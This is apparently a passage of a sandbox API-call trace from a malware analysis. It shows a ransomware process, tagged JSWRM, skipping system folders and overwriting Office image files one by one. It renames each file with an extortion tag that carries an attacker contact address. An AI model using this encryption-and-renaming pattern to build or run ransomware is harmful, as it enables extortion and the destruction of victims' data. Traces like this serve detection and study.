(lpString1="LoginTool24x24Images.jpg", lpString2="windows") returned -1 [0130.986] lstrcmpiW (lpString1="LoginTool24x24Images.jpg", lpString2="recovery") returned -1 [0130.986] lstrcmpiW (lpString1="LoginTool24x24Images.jpg", lpString2="perflogs") returned -1 [0130.986] lstrcmpiW (lpString1="LoginTool24x24Images.jpg", lpString2="documents and settings") returned 1 [0130.986] lstrcmpiW (lpString1="LoginTool24x24Images.jpg", lpString2="$RECYCLE.BIN") returned 1 [0130.986] lstrcmpiW (lpString1="LoginTool24x24Images.jpg", lpString2="system volume information") returned -1 [0130.986] lstrcmpiW (lpString1="LoginTool24x24Images.jpg", lpString2="msocache") returned -1 [0130.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LoginTool24x24Images.jpg", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0130.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LoginTool24x24Images.jpg", cchWideChar=24, lpMultiByteStr=0x241060, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LoginTool24x24Images.jpg", lpUsedDefaultChar=0x0) returned 24 [0130.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LoginTool24x24Images.jpg", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0130.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LoginTool24x24Images.jpg", cchWideChar=24, lpMultiByteStr=0x241178, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LoginTool24x24Images.jpg", lpUsedDefaultChar=0x0) returned 24 [0130.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\LoginTool24x24Images.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\logintool24x24images.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.987] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=7827) returned 1 [0130.987] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.987] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0x1e90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0x1e90, lpOverlapped=0x0) returned 1 [0130.989] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.989] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1e90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0x1e90, lpOverlapped=0x0) returned 1 [0130.989] CloseHandle (hObject=0x314) returned 1 [0130.989] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\LoginTool24x24Images.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\logintool24x24images.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\LoginTool24x24Images.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\logintool24x24images.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.990] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1907d846, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1907d846, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1907d846, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaf8, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="LoginTool24x24ImagesMask.bmp", cAlternateFileName="LOGINT~1.BMP")) returned 1 [0130.990] lstrcmpiW (lpString1="LoginTool24x24ImagesMask.bmp", lpString2=".") returned 1 [0130.990] lstrcmpiW (lpString1="LoginTool24x24ImagesMask.bmp", lpString2="..") returned 1 [0130.990] lstrcmpiW (lpString1="LoginTool24x24ImagesMask.bmp", lpString2="...") returned 1 [0130.990] lstrcmpiW (lpString1="LoginTool24x24ImagesMask.bmp", lpString2="windows") returned -1 [0130.990] lstrcmpiW (lpString1="LoginTool24x24ImagesMask.bmp", lpString2="recovery") returned -1 [0130.991] lstrcmpiW (lpString1="LoginTool24x24ImagesMask.bmp", lpString2="perflogs") returned -1 [0130.991] lstrcmpiW (lpString1="LoginTool24x24ImagesMask.bmp", lpString2="documents and settings") returned 1 [0130.991] lstrcmpiW (lpString1="LoginTool24x24ImagesMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0130.991] lstrcmpiW (lpString1="LoginTool24x24ImagesMask.bmp", lpString2="system volume information") returned -1 [0130.991] lstrcmpiW (lpString1="LoginTool24x24ImagesMask.bmp", lpString2="msocache") returned -1 [0130.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LoginTool24x24ImagesMask.bmp", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0130.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LoginTool24x24ImagesMask.bmp", cchWideChar=28, lpMultiByteStr=0x240f48, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LoginTool24x24ImagesMask.bmp", lpUsedDefaultChar=0x0) returned 28 [0130.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LoginTool24x24ImagesMask.bmp", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0130.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LoginTool24x24ImagesMask.bmp", cchWideChar=28, lpMultiByteStr=0x2410d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LoginTool24x24ImagesMask.bmp", lpUsedDefaultChar=0x0) returned 28 [0130.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\LoginTool24x24ImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\logintool24x24imagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.992] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2808) returned 1 [0130.992] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.992] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xaf0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xaf0, lpOverlapped=0x0) returned 1 [0130.994] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.994] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xaf0, lpOverlapped=0x0) returned 1 [0130.994] CloseHandle (hObject=0x314) returned 1 [0130.994] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\LoginTool24x24ImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\logintool24x24imagesmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\LoginTool24x24ImagesMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\logintool24x24imagesmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.995] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197cab56, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197cab56, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197cab56, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25e5, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="MessageAttachmentIconImages.jpg", cAlternateFileName="MESSAG~2.JPG")) returned 1 [0130.995] lstrcmpiW (lpString1="MessageAttachmentIconImages.jpg", lpString2=".") returned 1 [0130.995] lstrcmpiW (lpString1="MessageAttachmentIconImages.jpg", lpString2="..") returned 1 [0130.995] lstrcmpiW (lpString1="MessageAttachmentIconImages.jpg", lpString2="...") returned 1 [0130.995] lstrcmpiW (lpString1="MessageAttachmentIconImages.jpg", lpString2="windows") returned -1 [0130.995] lstrcmpiW (lpString1="MessageAttachmentIconImages.jpg", lpString2="recovery") returned -1 [0130.995] lstrcmpiW (lpString1="MessageAttachmentIconImages.jpg", lpString2="perflogs") returned -1 [0130.995] lstrcmpiW (lpString1="MessageAttachmentIconImages.jpg", lpString2="documents and settings") returned 1 [0130.995] lstrcmpiW (lpString1="MessageAttachmentIconImages.jpg", lpString2="$RECYCLE.BIN") returned 1 [0130.995] lstrcmpiW (lpString1="MessageAttachmentIconImages.jpg", lpString2="system volume information") returned -1 [0130.995] lstrcmpiW (lpString1="MessageAttachmentIconImages.jpg", lpString2="msocache") returned -1 [0130.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageAttachmentIconImages.jpg", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0130.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageAttachmentIconImages.jpg", cchWideChar=31, lpMultiByteStr=0x2411c8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MessageAttachmentIconImages.jpg", lpUsedDefaultChar=0x0) returned 31 [0130.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageAttachmentIconImages.jpg", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0130.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageAttachmentIconImages.jpg", cchWideChar=31, lpMultiByteStr=0x240fc0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MessageAttachmentIconImages.jpg", lpUsedDefaultChar=0x0) returned 31 [0130.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\MessageAttachmentIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\messageattachmenticonimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.999] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9701) returned 1 [0130.999] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.000] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x25e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x25e0, lpOverlapped=0x0) returned 1 [0131.002] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.002] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x25e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x25e0, lpOverlapped=0x0) returned 1 [0131.003] CloseHandle (hObject=0x314) returned 1 [0131.003] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\MessageAttachmentIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\messageattachmenticonimages.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\MessageAttachmentIconImages.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\messageattachmenticonimages.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.004] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19817013, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x838, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="MessageAttachmentIconImagesMask.bmp", cAlternateFileName="MESSAG~2.BMP")) returned 1 [0131.004] lstrcmpiW (lpString1="MessageAttachmentIconImagesMask.bmp", lpString2=".") returned 1 [0131.004] lstrcmpiW (lpString1="MessageAttachmentIconImagesMask.bmp", lpString2="..") returned 1 [0131.004] lstrcmpiW (lpString1="MessageAttachmentIconImagesMask.bmp", lpString2="...") returned 1 [0131.004] lstrcmpiW (lpString1="MessageAttachmentIconImagesMask.bmp", lpString2="windows") returned -1 [0131.004] lstrcmpiW (lpString1="MessageAttachmentIconImagesMask.bmp", lpString2="recovery") returned -1 [0131.004] lstrcmpiW (lpString1="MessageAttachmentIconImagesMask.bmp", lpString2="perflogs") returned -1 [0131.004] lstrcmpiW (lpString1="MessageAttachmentIconImagesMask.bmp", lpString2="documents and settings") returned 1 [0131.004] lstrcmpiW (lpString1="MessageAttachmentIconImagesMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.004] lstrcmpiW (lpString1="MessageAttachmentIconImagesMask.bmp", lpString2="system volume information") returned -1 [0131.004] lstrcmpiW (lpString1="MessageAttachmentIconImagesMask.bmp", lpString2="msocache") returned -1 [0131.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageAttachmentIconImagesMask.bmp", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0131.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageAttachmentIconImagesMask.bmp", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MessageAttachmentIconImagesMask.bmp", lpUsedDefaultChar=0x0) returned 35 [0131.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageAttachmentIconImagesMask.bmp", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0131.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageAttachmentIconImagesMask.bmp", cchWideChar=35, lpMultiByteStr=0x22d0d8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MessageAttachmentIconImagesMask.bmp", lpUsedDefaultChar=0x0) returned 35 [0131.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\MessageAttachmentIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\messageattachmenticonimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.012] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2104) returned 1 [0131.012] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.012] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x830, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x830, lpOverlapped=0x0) returned 1 [0131.019] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.019] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x830, lpOverlapped=0x0) returned 1 [0131.019] CloseHandle (hObject=0x314) returned 1 [0131.020] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\MessageAttachmentIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\messageattachmenticonimagesmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\MessageAttachmentIconImagesMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\messageattachmenticonimagesmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.020] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19758458, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19758458, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19758458, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x22f6, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="MessageHistoryIconImages.jpg", cAlternateFileName="MESSAG~1.JPG")) returned 1 [0131.020] lstrcmpiW (lpString1="MessageHistoryIconImages.jpg", lpString2=".") returned 1 [0131.020] lstrcmpiW (lpString1="MessageHistoryIconImages.jpg", lpString2="..") returned 1 [0131.021] lstrcmpiW (lpString1="MessageHistoryIconImages.jpg", lpString2="...") returned 1 [0131.021] lstrcmpiW (lpString1="MessageHistoryIconImages.jpg", lpString2="windows") returned -1 [0131.021] lstrcmpiW (lpString1="MessageHistoryIconImages.jpg", lpString2="recovery") returned -1 [0131.021] lstrcmpiW (lpString1="MessageHistoryIconImages.jpg", lpString2="perflogs") returned -1 [0131.021] lstrcmpiW (lpString1="MessageHistoryIconImages.jpg", lpString2="documents and settings") returned 1 [0131.021] lstrcmpiW (lpString1="MessageHistoryIconImages.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.021] lstrcmpiW (lpString1="MessageHistoryIconImages.jpg", lpString2="system volume information") returned -1 [0131.021] lstrcmpiW (lpString1="MessageHistoryIconImages.jpg", lpString2="msocache") returned -1 [0131.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageHistoryIconImages.jpg", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0131.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageHistoryIconImages.jpg", cchWideChar=28, lpMultiByteStr=0x241290, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MessageHistoryIconImages.jpg", lpUsedDefaultChar=0x0) returned 28 [0131.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageHistoryIconImages.jpg", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0131.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageHistoryIconImages.jpg", cchWideChar=28, lpMultiByteStr=0x2412e0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MessageHistoryIconImages.jpg", lpUsedDefaultChar=0x0) returned 28 [0131.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\MessageHistoryIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\messagehistoryiconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.022] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=8950) returned 1 [0131.022] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.022] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x22f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x22f0, lpOverlapped=0x0) returned 1 [0131.075] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.075] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x22f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x22f0, lpOverlapped=0x0) returned 1 [0131.075] CloseHandle (hObject=0x314) returned 1 [0131.075] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\MessageHistoryIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\messagehistoryiconimages.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\MessageHistoryIconImages.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\messagehistoryiconimages.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.078] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197321ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197321ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19758458, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="MessageHistoryIconImagesMask.bmp", cAlternateFileName="MESSAG~1.BMP")) returned 1 [0131.078] lstrcmpiW (lpString1="MessageHistoryIconImagesMask.bmp", lpString2=".") returned 1 [0131.078] lstrcmpiW (lpString1="MessageHistoryIconImagesMask.bmp", lpString2="..") returned 1 [0131.078] lstrcmpiW (lpString1="MessageHistoryIconImagesMask.bmp", lpString2="...") returned 1 [0131.078] lstrcmpiW (lpString1="MessageHistoryIconImagesMask.bmp", lpString2="windows") returned -1 [0131.078] lstrcmpiW (lpString1="MessageHistoryIconImagesMask.bmp", lpString2="recovery") returned -1 